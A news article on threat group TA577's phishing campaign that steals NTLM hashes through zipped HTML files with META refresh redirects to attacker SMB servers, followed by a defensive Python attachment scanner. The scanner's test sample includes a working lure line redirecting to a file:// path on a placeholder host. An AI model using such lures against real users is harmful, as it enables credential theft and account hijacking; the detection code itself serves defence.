TA577 Shifts Tactics with Phishing Emails to Steal NTLM Hashes

The notorious hacking group TA577 has recently made a strategic shift in their tactics by utilizing phishing emails to steal NT LAN Manager (NTLM) authentication hashes, ultimately leading to account hijacks. Known as an initial access broker (IAB) and previously associated with Qbot and Black Basta ransomware infections, TA577 has caught the attention of cybersecurity experts once again.

New Attack Waves Targeting NTLM Hashes

Email security firm Proofpoint has reported that TA577 has been showing a preference for deploying Pikabot, but recent attack waves on February 26 and 27, 2024, have demonstrated a different approach. These campaigns targeted thousands of organizations worldwide, aiming to steal employees' NTLM hashes, which are crucial for Windows authentication and session security.

NTLM hashes can be exploited for offline password cracking or used in "pass-the-hash" attacks, allowing attackers to authenticate to remote servers without cracking the password. This stolen information can enable attackers to escalate privileges, hijack accounts, access sensitive data, evade security measures, and move laterally within a compromised network.

Phishing Emails as the Entry Point

The new campaign initiated by TA577 involves phishing emails that mimic replies to ongoing discussions, a tactic known as thread hijacking. These emails contain unique ZIP archives with HTML files that automatically connect to an external Server Message Block (SMB) server using META refresh HTML tags.

When a Windows device connects to the server, it triggers an NTLMv2 Challenge/Response, allowing the attacker-controlled server to steal the NTLM authentication hashes. Proofpoint's report highlights that the malicious HTML files were delivered in ZIP archives to generate local files on the host, making them more effective in bypassing security measures.

Defensive Measures and Recommendations

Cybersecurity professionals emphasize the importance of implementing defensive measures to prevent such attacks. Brian from Pittsburgh notes that disabling multi-factor authentication on accounts is a prerequisite for threat actors to leverage stolen hashes for network breaches. Vulnerability researcher Will Dormann suggests that the stolen hashes might be used for reconnaissance to identify valuable targets.

To mitigate TA577 attacks, organizations can consider configuring firewalls to block outbound SMB connections, implementing email filtering to block messages with zipped HTML files, and restricting outgoing NTLM traffic to remote servers using Windows group policy settings. For Windows 11 users, Microsoft has introduced additional security features to block NTLM-based attacks over SMB, offering a more robust defense against such threats.
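As an added example (not code from Proofpoint or the original article), the email-filtering control above applied to the delivery mechanism described earlier: scan a zipped attachment for HTML members whose META refresh target is a file:// URL or UNC path, the pattern that makes a Windows host open an outbound SMB session. The sample archive, its member names and the 192.0.2.10 address are constructed for illustration.

```python
import io
import re
import zipfile
from html.parser import HTMLParser

# Pulls the target out of a meta refresh value such as "0; url=file://host/share"
_REFRESH_URL = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.IGNORECASE)


def is_smb_target(url: str) -> bool:
    """True when opening the URL makes Windows start an SMB session (file:// or UNC path)."""
    u = url.strip().lower()
    return u.startswith("file:") or u.startswith("\\\\")


class _RefreshFinder(HTMLParser):
    # Collects the target of every <meta http-equiv="refresh"> tag in a document.
    def __init__(self) -> None:
        super().__init__()
        self.targets: list[str] = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser already lowercases names
        if tag != "meta" or a.get("http-equiv", "").lower() != "refresh":
            return
        m = _REFRESH_URL.search(a.get("content", ""))
        if m:
            self.targets.append(m.group(1).strip())


def scan_zip_attachment(zip_bytes: bytes) -> list[dict]:
    """One finding per HTML member whose meta refresh points at an SMB target."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".htm", ".html")):
                continue
            finder = _RefreshFinder()
            finder.feed(zf.read(info).decode("utf-8", errors="replace"))
            findings += [{"member": info.filename, "target": t}
                         for t in finder.targets if is_smb_target(t)]
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: one member redirects to a UNC path (RFC 5737 test address), one to HTTPS."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.html", '<meta http-equiv="refresh" '
                    'content="0; url=file://192.0.2.10/share/doc">')
        zf.writestr("notice.html", '<meta http-equiv="refresh" '
                    'content="5; url=https://example.com/">')
    return buf.getvalue()
```

Only the member whose refresh target would trigger an SMB connection is reported; an ordinary HTTPS refresh passes, so the check can sit in a mail gateway without flagging every HTML attachment.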

In the ever-evolving landscape of cybersecurity threats, staying vigilant and proactive in implementing security measures is crucial to safeguarding sensitive information and preventing unauthorized access to networks. TA577's shift in tactics underscores the need for organizations to adapt and strengthen their defenses against sophisticated cyber threats.

Saadat Qureshi

Hey, I'm Saadat Qureshi, your guide through the exciting worlds of education and technology. Originally from Karachi and a proud alum of the University of Birmingham, I'm now back in Karachi, Pakistan, exploring the intersection of learning and tech. Stick around for my fresh takes on the digital revolution!